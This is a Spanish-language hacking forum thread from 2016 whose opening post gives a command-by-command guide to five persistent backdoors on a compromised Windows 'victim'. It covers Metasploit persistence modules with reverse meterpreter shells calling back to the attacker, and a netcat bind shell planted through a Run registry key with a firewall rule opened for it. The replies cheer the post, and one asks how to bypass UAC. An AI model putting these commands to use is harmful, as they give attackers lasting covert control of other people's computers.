comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

5 Backdoors Persistentes

  • 2 Respuestas
  • 2436 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado afravaz

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación -1
  • Tú blog sobre Seguridad Informática en español.
    • Ver Perfil
    • El Candado Informático
« en: Septiembre 06, 2016, 09:22:13 am »

Requisitos:
Sesión meterpreter con permisos elevados (Bypass UAC)
Metasploit
Netcat
Distribución Linux (Atacante)
Windows (Víctima)

Persistencia:
En la sesión meterpreter con permisos elevados:
Citar
run persistence –X –i 10 –p 443 –r [IP]
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
-X= Conectarse cuando el sistema reinicie.
-i 10= Intentar conectarse cada 10 segundos.
-p 443= Puerto de conexión reversa.
-r ip= IP de conexión reversa-
Después de haber ejecutado el script, reiniciamos el equipo víctima y usamos el exploit:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 443
set LHOST [IP LOCAL]
exploit

s4u_persistence:
Crea una tarea programada que se ejecutará utilizando el servicio para el usuario (S4U). Esto permite que la tarea programada para ejecutarse incluso como un usuario sin privilegios que no se registra en el dispositivo. Esto resultará en contexto de seguridad más bajo, lo que permite el acceso sólo a los recursos locales. El módulo requiere ‘Logon as a batch job’ permisos (SeBatchLogonRight).
Pondremos en background la sesión meterpreter con bypass uac y:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
use exploit/windows/local/s4u_persistence
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 443
set trigger logon
set session [Número sesión]
exploit
Después de haber ejecutado el script, reiniciamos el equipo víctima y usamos el exploit:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
exploit

VSS_PERSISTENCE:
Este módulo intentará crear un payload persistente en una nueva instantánea de volumen. Esto se basa en la secuencia de comandos VSSOwn publicado originalmente por Tim Tomes y Mark Baggett. Este módulo ha sido probado con éxito en Windows 7. Con el fin de lograr la persistencia a través de la opción RUNKEY, el usuario debe necesitar una contraseña para iniciar sesión en el equipo atacado.
Primero consigue una shell meterpreter con bypass uac y pon en background la sesión despues ejecuta los siguientes comandos:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
use exploit/windows/local/vss_persistence
set runkey true
set schtask true
set RHOST [IP VÍCTIMA]
set session [Número sesión]
exploit
Ahora al ejecutar el exploit se creará un backdoor y una nueva sesión meterpreter.
Ahora al reiniciar el equipo víctima se perderán las sesiones meterpreter, usa el siguiente comando para abrir una nueva:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 4444
exploit

REGISTRY PERSISTENCE:
En este módulo se instalará un payload que se ejecutará durante el arranque. Será ejecutado ya sea al iniciar la sesión de usuario o el inicio del sistema mediante el valor de registro en “CurrentVersion \ Run” (dependiendo de privilegio y método seleccionado). El payload se instalará completamente en el primer registro de la sesión fondo meterpreter y luego ejecutar los comandos:
Primero consigue una shell meterpreter con bypass uac y pon en background la sesión despues ejecuta los siguientes comandos:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
use exploit/windows/local/registry_persistence
set payload windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 4545
set startup system
set session [Número de la sesión]
exploit
Ahora al reiniciar el sistema perderemos las sesiones asique usaremos los siguientes comandos para abrir una nueva:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP LOCAL]
set LPORT 4545
exploit

NETCAT:
Netcat es una utilidad de red ofrecido que lee y escribe datos a través de conexiones de red, utilizando el protocolo TCP / IP.
Después de tener nuestra sesión meterpreter con bypass uac pondremos:
Citar
upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32
Ahora vamos a setear el valor del registro:
Citar
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’
Abrimos una shell con el comando:
Citar
shell
Y abriremos el puerto en el firewall:
Citar
netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445
Para saber que todo está bien configurado pondremos:
Citar
netsh firewall show portopening
Veremos que tenemos la regla de netcat en el firewall.
Una vez reiniciemos el pc víctima, para conectarnos a él usaremos el comando:
Citar
nc  -nv [IP VÍCTIMA] [PUERTO/4445]
« Última modificación: Septiembre 06, 2016, 01:13:21 pm por Gabriela »
elcandadoinformatico. Tú blog sobre Seguridad Informática en español.

Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 370
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
« Respuesta #1 en: Septiembre 06, 2016, 11:30:33 am »
Zarpado!! Copado posta maaaaaal!

Que ganas de probarlo!- Formas de bypassear el UAC sin meterpreter, desde windows en la misma red, como se puede?
« Última modificación: Septiembre 06, 2016, 01:13:52 pm por Gabriela »
Pikaa~


Desconectado Dr4g0n4Y

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 1
  • El objetivo es lo imposible
    • Ver Perfil
    • Email
« Respuesta #2 en: Septiembre 06, 2016, 03:29:27 pm »
Justo lo que estaba buscando, gracias por todas las opciones detalladas afravaz

 

¿Te gustó el post? COMPARTILO!



Backdoor-APK - Script para agregar backdoors a las APKs

Iniciado por ANTRAX

Respuestas: 2
Vistas: 2862
Último mensaje Enero 12, 2017, 12:44:20 am
por R3v0lve
Como crear backdoors en metasploit.[Algunos tipos]

Iniciado por J0k3$

Respuestas: 4
Vistas: 4256
Último mensaje Septiembre 26, 2013, 01:42:08 am
por pelumon